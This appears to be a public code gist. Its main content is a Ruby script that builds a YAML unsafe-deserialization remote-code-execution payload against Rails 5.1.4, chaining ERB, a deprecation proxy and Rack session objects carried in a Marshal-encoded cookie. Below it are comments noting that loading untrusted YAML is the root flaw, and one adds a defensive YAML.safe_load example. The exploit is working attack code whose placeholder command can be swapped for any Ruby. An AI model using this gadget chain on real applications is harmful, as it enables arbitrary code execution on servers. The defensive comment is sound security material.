Rails 5.1.4 YAML unsafe deserialization RCE payload
require 'yaml'
require 'base64'
require 'erb'

# Local stand-ins for the ActiveSupport classes, so that Marshal.dump emits
# objects carrying these class names and instance variables. The target app
# has the real classes loaded; this script only needs the names to match.
class ActiveSupport
  class Deprecation
    def initialize()
      @silenced = true
    end
    class DeprecatedInstanceVariableProxy
      def initialize(instance, method)
        @instance = instance
        @method = method
        @deprecator = ActiveSupport::Deprecation.new
      end
    end
  end
end

# Ruby code that runs when the ERB object's +result+ method is invoked.
code = <<-EOS
puts "pwned"
EOS

# An ERB whose compiled source is the code above; erb.result evaluates it.
erb = ERB.allocate
erb.instance_variable_set :@src, code
erb.instance_variable_set :@lineno, 1337

# Proxy that forwards to erb.result; marshalled and Base64-encoded so it can
# be carried as a cookie value inside the YAML document below.
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result
payload = Base64.encode64(Marshal.dump(depr)).gsub("\n", "")

# YAML document: an unsafe YAML.load rebuilds these Rack objects, and the
# Cookie::Base64::Marshal coder then Marshal.loads the cookie value above.
payload = <<-PAYLOAD
---
!ruby/object:Gem::Requirement
requirements:
  !ruby/object:Rack::Session::Abstract::SessionHash
    req: !ruby/object:Rack::Request
      env:
        "rack.session": !ruby/object:Rack::Session::Abstract::SessionHash
          id: 'hi from espr'
        HTTP_COOKIE: "a=#{payload}"
    store: !ruby/object:Rack::Session::Cookie
      coder: !ruby/object:Rack::Session::Cookie::Base64::Marshal {}
      key: a
      secrets: []
    exists: true
    loaded: false
PAYLOAD
puts payload
RicterZ Nov 21, 2017

A 0-day? I couldn't find any information about this security issue on the Rails official website or on GitHub.


niklasb May 31, 2018

@RicterZ If you load untrusted YAML without safe mode, you have a security issue regardless of this payload.
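The check niklasb is pointing at, as an added example that is not code from this gist or from Rails: Psych's `safe_load` builds only plain scalars, arrays and hashes (plus classes you explicitly permit) and raises on the `!ruby/object:` tags the payload above depends on, so the gadget objects are never instantiated. Both YAML documents below are constructed samples, and `parse_untrusted_yaml` is a name chosen for this example.

```ruby
require 'yaml'

# Constructed sample: a benign settings document an app might accept from
# a user-controlled source (an uploaded config file, a request body).
BENIGN_DOC = <<~YAML
  ---
  name: demo
  retries: 3
  tags:
    - web
    - api
YAML

# Constructed sample: same shape, but one value carries a !ruby/object tag
# (the same kind of tag the payload above opens with). An unsafe YAML.load
# would instantiate the named class; safe_load refuses to.
TAGGED_DOC = <<~YAML
  ---
  name: demo
  settings: !ruby/object:Gem::Requirement
    requirements: []
YAML

# Parse YAML that did not come from a trusted source.
# Returns [:ok, data] on success or [:rejected, exception_class_name] when the
# document tries to build an object (!ruby/object, !ruby/class, ...), uses an
# alias (which aliases: false forbids), or is not valid YAML at all.
def parse_untrusted_yaml(doc)
  data = YAML.safe_load(doc, permitted_classes: [Symbol], aliases: false)
  [:ok, data]
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError => e
  [:rejected, e.class.name]
end

if __FILE__ == $PROGRAM_NAME
  p parse_untrusted_yaml(BENIGN_DOC)
  p parse_untrusted_yaml(TAGGED_DOC)
end
```

Note that from Psych 4 (Ruby 3.1 and later) `YAML.load` is itself `safe_load` and the old behaviour is only available as `YAML.unsafe_load`; on the Psych versions shipped with the Rails release in this gist's title, `YAML.load` is the unsafe path, so call `safe_load` explicitly and keep `permitted_classes` to the minimum the data actually needs.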


g0rx Sep 13, 2018

RicterZ kinda off; the problem started from 2013, but it seems new to load untrusted YAML, too bad.

